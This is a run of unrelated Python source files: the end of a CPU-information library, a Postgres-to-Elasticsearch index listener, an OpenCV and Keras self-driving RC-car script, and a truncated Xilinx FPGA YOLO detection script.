'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
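# Hedged illustration (not part of the upstream module): CopyNewFields only
# fills fields that are still empty and unions 'flags', so the earlier,
# higher-priority source wins for scalar fields. All values below are made up.
def _copy_new_fields_example():
    info = {'brand': 'CPU A', 'flags': ['sse']}
    CopyNewFields(info, {'brand': 'CPU B', 'vendor_id': 'ExampleVendor', 'flags': ['sse2']})
    return info  # {'brand': 'CPU A', 'vendor_id': 'ExampleVendor', 'flags': ['sse', 'sse2']}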
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
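# Hedged usage sketch (not part of the upstream module): every key returned by
# get_cpu_info() is optional, because empty values are filtered out per source,
# so callers should read fields with .get() and a default.
def _example_print_brand_and_speed():
    info = get_cpu_info()
    print('{0} @ {1}'.format(info.get('brand', 'unknown CPU'),
                             info.get('hz_advertised', 'unknown speed')))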
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if arch not in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X', 'MIPS_32', 'MIPS_64', 'LOONG_32', 'LOONG_64']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC, S390X, MIPS, LOONG and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('python version: {0}'.format(info.get('python_version', '')))
print('cpuinfo version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
es_index_listener.py
|
"""\
Example.
%(prog)s production.ini
"""
from webtest import TestApp
from contentbase.storage import DBSession
import atexit
import datetime
import json
import logging
import os
import psycopg2
import select
import signal
import socket
import sqlalchemy.exc
import sys
import threading
import time
from urllib.parse import parse_qsl
log = logging.getLogger(__name__)
EPILOG = __doc__
DEFAULT_TIMEOUT = 60
PY2 = sys.version_info[0] == 2
# We need this because of MVCC visibility.
# See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf
# https://devcenter.heroku.com/articles/postgresql-concurrency
def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, control=None, update_status=None):
assert update_status is not None
timestamp = datetime.datetime.now().isoformat()
update_status(
status='connecting',
timestamp=timestamp,
timeout=timeout,
)
max_xid = 0
engine = DBSession.bind # DBSession.bind is configured by app init
# noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine
connection = engine.pool.unique_connection()
try:
connection.detach()
conn = connection.connection
conn.autocommit = True
sockets = [conn]
if control is not None:
sockets.append(control)
recovery = None
listening = False
with conn.cursor() as cursor:
while True:
if not listening:
# cannot execute LISTEN during recovery
cursor.execute("""SELECT pg_is_in_recovery();""")
recovery, = cursor.fetchone()
if not recovery:
# http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications
cursor.execute("""LISTEN "contentbase.transaction";""")
cursor.execute("""LISTEN "clincoded.transaction";""") # BBB
log.debug("Listener connected")
listening = True
cursor.execute("""SELECT txid_current_snapshot();""")
snapshot, = cursor.fetchone()
timestamp = datetime.datetime.now().isoformat()
update_status(
listening=listening,
recovery=recovery,
snapshot=snapshot,
status='indexing',
timestamp=timestamp,
max_xid=max_xid,
)
try:
res = testapp.post_json('/index', {
'record': True,
'dry_run': dry_run,
'recovery': recovery,
})
except Exception as e:
timestamp = datetime.datetime.now().isoformat()
log.exception('index failed at max xid: %d', max_xid)
update_status(error={
'error': repr(e),
'max_xid': max_xid,
'timestamp': timestamp,
})
else:
timestamp = datetime.datetime.now().isoformat()
result = res.json
result['stats'] = {
k: int(v) for k, v in parse_qsl(
res.headers.get('X-Stats', ''))
}
result['timestamp'] = timestamp
update_status(last_result=result)
if result.get('indexed', 0):
update_status(result=result)
log.info(result)
update_status(
status='waiting',
timestamp=timestamp,
max_xid=max_xid,
)
# Wait for a notification
readable, writable, err = select.select(sockets, [], sockets, timeout)
if err:
raise Exception('Socket error')
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
if conn in readable:
conn.poll()
while conn.notifies:
notify = conn.notifies.pop()
xid = int(notify.payload)
max_xid = max(max_xid, xid)
log.debug('NOTIFY %s, %s', notify.channel, notify.payload)
finally:
connection.close()
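# Minimal hedged sketch of the LISTEN/select/poll pattern used in run() above.
# The DSN is hypothetical and this helper is not wired into the module; it only
# shows the psycopg2 calls involved (autocommit, LISTEN, conn.poll, conn.notifies).
def _listen_notify_example(dsn='dbname=example'):
    conn = psycopg2.connect(dsn)
    conn.autocommit = True  # LISTEN must not sit inside an open transaction
    with conn.cursor() as cursor:
        cursor.execute("""LISTEN "contentbase.transaction";""")
        while True:
            readable, _, _ = select.select([conn], [], [], DEFAULT_TIMEOUT)
            if not readable:
                continue  # timed out; poll again
            conn.poll()
            while conn.notifies:
                notify = conn.notifies.pop()
                log.debug('NOTIFY %s, %s', notify.channel, notify.payload)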
class ErrorHandlingThread(threading.Thread):
if PY2:
@property
def _kwargs(self):
return self._Thread__kwargs
@property
def _args(self):
return self._Thread__args
@property
def _target(self):
return self._Thread__target
def run(self):
timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT)
update_status = self._kwargs['update_status']
control = self._kwargs['control']
while True:
try:
self._target(*self._args, **self._kwargs)
except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError) as e:
# Handle database restart
log.exception('Database went away')
timestamp = datetime.datetime.now().isoformat()
update_status(
timestamp=timestamp,
status='sleeping',
error={'error': repr(e), 'timestamp': timestamp},
)
readable, _, _ = select.select([control], [], [], timeout)
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
log.debug('sleeping')
time.sleep(timeout)
continue
except Exception:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in listener, restarting process at next request.')
os.kill(os.getpid(), signal.SIGINT)
break
def composite(loader, global_conf, **settings):
listener = None
# Register before testapp creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
testapp = TestApp(app, environ)
# Use sockets to integrate with select
controller, control = socket.socketpair()
timestamp = datetime.datetime.now().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'errors': [],
'results': [],
},
}
def update_status(error=None, result=None, indexed=None, **kw):
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw)
if error is not None:
status['errors'] = [error] + status['errors'][:9]
if result is not None:
status['results'] = [result] + status['results'][:9]
status_holder['status'] = status
kwargs = {
'testapp': testapp,
'control': control,
'update_status': update_status,
}
if 'timeout' in settings:
kwargs['timeout'] = float(settings['timeout'])
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('starting listener')
listener.start()
# Register before testapp creation.
@atexit.register
def shutdown_listener():
log.debug('shutting down listening thread')
control # Prevent early gc
controller.shutdown(socket.SHUT_RDWR)
def status_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
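# Hedged stand-alone sketch (not wired into composite above) of the
# copy-then-replace trick update_status relies on: readers of
# status_holder['status'] always see a complete dict, because the reference is
# swapped in a single assignment instead of being mutated in place.
def _update_status_example(status_holder, **kw):
    status = status_holder['status'].copy()
    status.update(**kw)
    status_holder['status'] = status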
def internal_app(configfile, app_name=None, username=None):
from webtest import TestApp
from pyramid import paster
app = paster.get_app(configfile, app_name)
if not username:
username = 'IMPORT'
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
return TestApp(app, environ)
def main():
import argparse
parser = argparse.ArgumentParser(
description="Listen for changes from postgres and index in elasticsearch",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument(
'--username', '-u', default='INDEXER', help="Import username")
parser.add_argument(
'--dry-run', action='store_true', help="Don't post to ES, just print")
parser.add_argument(
'-v', '--verbose', action='store_true', help="Print debug level logging")
parser.add_argument(
'--poll-interval', type=int, default=DEFAULT_TIMEOUT,
help="Poll interval between notifications")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
testapp = internal_app(args.config_uri, args.app_name, args.username)
# Loading the app will already have configured logging from the config file. Reconfigure here:
if args.verbose or args.dry_run:
logging.getLogger('clincoded').setLevel(logging.DEBUG)
return run(testapp, args.poll_interval, args.dry_run)
if __name__ == '__main__':
main()
|
autonomous_v9.py
|
'''
Attempt to incorporate ultrasonic sensor.
'''
import car
import cv2
import numpy as np
import os
import serial
import socket
import SocketServer
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
SIGMA = 0.33
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
# distance data measured by ultrasonic sensor
sensor_data = " "
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(100)
car.pause(300)
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class SensorDataHandler(SocketServer.BaseRequestHandler):
data = " "
def handle(self):
global sensor_data
try:
while self.data:
self.data = self.request.recv(1024)
sensor_data = round(float(self.data), 1)
#print "{} sent:".format(self.client_address[0])
print sensor_data
finally:
print "Connection closed on thread 2"
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(55, 55))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for pedestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
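# Hedged illustration (not part of the original script): non_max_suppression
# collapses heavily overlapping detections into a single pick; the boxes below
# are made-up (x1, y1, x2, y2) coordinates.
def _nms_example():
    boxes = np.array([[10, 10, 60, 110], [12, 12, 62, 112], [200, 50, 250, 150]])
    picked = non_max_suppression(boxes, probs=None, overlapThresh=0.65)
    return picked  # the two near-duplicate boxes collapse into one entry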
obj_detection = ObjectDetection()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
while self.receiving:
# There's a chance that the main thread reaches this point before the new thread begins streaming images.
# To account for this, we create the jpg variable set to None and keep polling until it actually holds a frame.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# Object detection
obj_detection.detect(stop_classifier, gray, image)
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GaussianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# Neural network model makes prediction
# prediction = self.model.predict(auto)
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
# cv2.putText(gray, "Model prediction: {}".format(prediction_english), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
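# Hedged stand-alone copy of the median-based thresholding used by
# NeuralNetwork.auto_canny above, for experimenting outside the class; it adds
# nothing new beyond exposing sigma as a parameter.
def auto_canny_example(blurred, sigma=SIGMA):
    v = np.median(blurred)
    lower = int(max(0, (1.0 - sigma) * v))
    upper = int(min(255, (1.0 + sigma) * v))
    return cv2.Canny(blurred, lower, upper)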
class PiVideoStream(object):
def __init__(self):
# self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
# self.server_socket.bind(('10.10.10.1', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
#
#
# print 'Listening...'
# self.server_socket.listen(0)
#
# # Accept a single connection ('rb' is 'read binary')
# self.connection = self.server_socket.accept()[0].makefile('rb')
#
# # initialize the frame and the variable used to indicate
# # if the thread should be stopped
# self.frame = None
# self.stopped = False
# self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon = True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
def read(self):
# return the frame most recently read
return self.frame
class ThreadServer(object):
def server_thread(host, port):
server = SocketServer.TCPServer((host, port), PiVideoStream)
server.serve_forever()
def server_thread2(host, port):
server = SocketServer.TCPServer((host, port), SensorDataHandler)
server.serve_forever()
distance_thread = threading.Thread(target=server_thread2, args=('10.10.10.1', 8002))
distance_thread.start()
video_thread = threading.Thread(target=server_thread, args=('10.10.10.1', 8000))
video_thread.start()
if __name__ == '__main__':
try:
ThreadServer()
except KeyboardInterrupt:
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating...\n'
car.pause(1000)
# # Close video_stream thread.
# video_stream = PiVideoStream()
# video_stream.stop()
# video_stream.connection.close()
#
# # Close serial connection to Arduino controller.
# ser = serial.Serial(port.device, 9600)
# ser.close()
print '\nDone.\n'
|
xs_detect_vitis.py
|
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import logging
import multiprocessing as mp
import multiprocessing.pool as mpp
import numpy as np
import time, timeit
import os, sys
import threading
from functools import partial
import math
from vai.dpuv1.rt import xstream, xdnn_io, xdnn
from vai.dpuv1.rt.vitis.python.dpu.runner import Runner
from vai.dpuv1.utils.postproc import yolo
from yolo_utils import bias_selector, saveDetectionDarknetStyle, yolo_parser_args
from yolo_utils import draw_boxes, generate_colors
from get_mAP_darknet import calc_detector_mAP
sys.path.insert(0, os.environ["VAI_ALVEO_ROOT"] + '/examples/deployment_modes')
from mp_classify_vitis import *
logging.basicConfig(filename='xs_detect_vitis.log', filemode='w', level=logging.DEBUG)
class yoloDispatcher(Dispatcher):
@staticmethod
def _run(work):
try:
(idx, images, args) = work
chanIdx = idx % Dispatcher.nWorkers
token = pid2TokenStr()
shape = Dispatcher.inshape
image_shapes = []
for i, img in enumerate(images):
cached = Dispatcher.inBlobCache.get(img)
if cached is None:
Dispatcher.inBlob[token][i, ...], img_shape = xdnn_io.loadYoloImageBlobFromFile(img, shape[2], shape[3])
Dispatcher.inBlobCache.set(img, (Dispatcher.inBlob[token][i].copy(), img_shape))
image_shapes.append(img_shape)
else:
Dispatcher.inBlob[token][i, ...] = cached[0]
image_shapes.append(cached[1])
meta = { 'id': idx, 'from': token, 'shape': shape, 'images': images, 'image_shapes': image_shapes }
if idx % 1000 == 0:
print("Put query %d to objstore" % idx)
sys.stdout.flush()
Dispatcher.xspub[token].put_blob(chanIdx2Str(chanIdx), Dispatcher.inBlob[token], meta)
Dispatcher.xstoken[token].get_msg()
except Exception as e:
logging.error("Producer exception " + str(e))
def run(self, work):
self.pool.map_async(yoloDispatcher._run, work)
class yoloWorkerPool(WorkerPool):
def __init__(self, rundir, nWorkers, workerArgs):
self.xspub = xstream.Publisher()
self.workers = []
self.wq = mp.Queue()
for wi in range(nWorkers):
w = mp.Process(target=yoloWorkerPool.run, args=(rundir, wi, self.wq, workerArgs,))
w.start()
self.workers.append(w)
# wait for worker to be ready before starting next worker
# because the last worker overwrites the IP programming
# (Note: this assumes all workers must have the same IP instructions)
self.wq.get()
@staticmethod
def run(rundir, chanIdx, q, args):
xspub = xstream.Publisher()
xssub = xstream.Subscribe(chanIdx2Str(chanIdx))
runner = Runner(rundir)
inTensors = runner.get_input_tensors()
outTensors = runner.get_output_tensors()
q.put(1) # ready for work
fpgaBlobs = None
labels = xdnn_io.get_labels(args['labels'])
if args['yolo_version'] == 'v2': yolo_postproc = yolo.yolov2_postproc
elif args['yolo_version'] == 'v3': yolo_postproc = yolo.yolov3_postproc
else: assert args['yolo_version'] in ('v2', 'v3'), "--yolo_version should be <v2|v3>"
biases = bias_selector(args)
if(args['visualize']): colors = generate_colors(len(labels))
while True:
try:
payload = xssub.get()
if not payload:
break
(meta, buf) = payload
if fpgaBlobs == None:
# allocate buffers
fpgaBlobs = []
batchsz = meta['shape'][0] # inTensors[0].dims[0]
for io in [inTensors, outTensors]:
blobs = []
for t in io:
shape = (batchsz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])
blobs.append(np.empty((shape), dtype=np.float32, order='C'))
fpgaBlobs.append(blobs)
fcOutput = np.empty((batchsz, args['outsz'],), dtype=np.float32, order='C')
fpgaInput = fpgaBlobs[0][0]
assert(tuple(meta['shape']) == fpgaInput.shape)
data = np.frombuffer(buf, dtype=np.float32).reshape(fpgaInput.shape)
np.copyto(fpgaInput, data)
jid = runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])
runner.wait(jid)
boxes = yolo_postproc(fpgaBlobs[1], args, meta['image_shapes'], biases=biases)
if(not args['profile']):
for i in range(min(batchsz, len(meta['image_shapes']))):
print("Detected {} boxes in {}".format(len(boxes[i]), meta['images'][i]), flush=True)
# Save the result
if(args['results_dir']):
for i in range(min(batchsz, len(meta['image_shapes']))):
fname = meta['images'][i]
filename = os.path.splitext(os.path.basename(fname))[0]
out_file_txt = os.path.join(args['results_dir'], filename + '.txt')
print("Saving {} boxes to {}".format(len(boxes[i]), out_file_txt)); sys.stdout.flush()
saveDetectionDarknetStyle(out_file_txt, boxes[i], meta['image_shapes'][i])
if(args['visualize']):
out_file_png = os.path.join(args['results_dir'], filename + '.png')
print("Saving result to {}".format(out_file_png)); sys.stdout.flush()
draw_boxes(fname, boxes[i], labels, colors, out_file_png)
if meta['id'] % 1000 == 0:
print("Recvd query %d" % meta['id'])
sys.stdout.flush()
del data
del buf
del payload
xspub.send(meta['from'], "success")
except Exception as e:
logging.error("Worker exception " + str(e))
def main():
parser = xdnn_io.default_parser_args()
parser = yolo_parser_args(parser)
args = parser.parse_args()
args = xdnn_io.make_dict_args(args)
g_nDispatchers = args['numprepproc']
g_nWorkers = args['numworkers']
# Setup the environment
images = xdnn_io.getFilePaths(args['images'])
if(args['golden'] or args['visualize']):
assert args['labels'], "Provide --labels to compute mAP."
assert args['results_dir'], "For accuracy measurements, provide --results_dir to save the detections."
# start comms
xserver = xstream.Server()
# acquire resources
fmaster = FpgaMaster(args['vitis_rundir'])
# update batch size
inshape = list(fmaster.inshape)
if args['batch_sz'] != -1:
